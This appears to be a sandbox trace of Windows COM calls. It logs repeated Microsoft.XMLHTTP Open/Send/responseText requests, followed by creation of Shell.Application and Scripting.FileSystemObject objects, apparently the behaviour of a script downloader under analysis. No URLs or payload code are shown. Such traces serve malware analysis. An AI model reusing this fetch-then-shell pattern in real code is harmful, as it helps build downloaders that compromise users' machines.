	[0528.873] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0528.873] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0528.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0528.873] ??2@YAPEAX_K@Z () returned 0x62f310
	[0528.873] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0528.873] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0528.873] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0528.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0528.873] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0528.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0528.874] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0528.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0528.874] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0528.874] SysStringLen (param_1=0x0) returned 0x0
	[0528.874] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0528.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0528.874] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0528.874] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0528.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0528.874] ??2@YAPEAX_K@Z () returned 0x62f330
	[0528.874] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0528.874] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0528.874] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0528.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0528.874] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0528.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0528.875] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0528.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0528.875] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0528.875] SysStringLen (param_1=0x0) returned 0x0
	[0528.875] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0528.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0528.875] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0528.875] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0528.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0528.875] ??2@YAPEAX_K@Z () returned 0x62f310
	[0528.875] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0528.875] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0528.875] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0528.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0528.875] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0528.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0528.969] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0528.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0528.970] longjmp () 
	[0528.970] longjmp () 
	[0528.970] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0528.970] SysStringLen (param_1=0x0) returned 0x0
	[0528.970] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0528.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0528.970] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0528.970] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0528.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0528.970] ??2@YAPEAX_K@Z () returned 0x62f330
	[0528.971] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0528.971] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0528.971] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0528.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0528.971] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0528.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0528.971] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0528.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0528.971] longjmp () 
	[0528.971] longjmp () 
	[0528.972] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0528.972] SysStringLen (param_1=0x0) returned 0x0
	[0528.972] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0528.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0528.972] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0528.972] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0528.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0528.972] ??2@YAPEAX_K@Z () returned 0x62f310
	[0528.972] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0528.972] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0528.972] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0528.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0528.972] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0528.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0528.973] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0528.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0528.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0528.973] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0528.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0529.479] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0529.479] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0529.480] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0529.480] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0529.480] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0529.480] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0529.480] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0529.480] SysStringLen (param_1=0x0) returned 0x0
	[0529.480] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0529.480] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0529.481] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0529.481] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0529.481] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0529.481] ??2@YAPEAX_K@Z () returned 0x62f350
	[0529.481] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0529.481] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0529.481] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0529.481] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0529.481] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0529.481] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0529.481] SysStringLen (param_1=0x0) returned 0x0
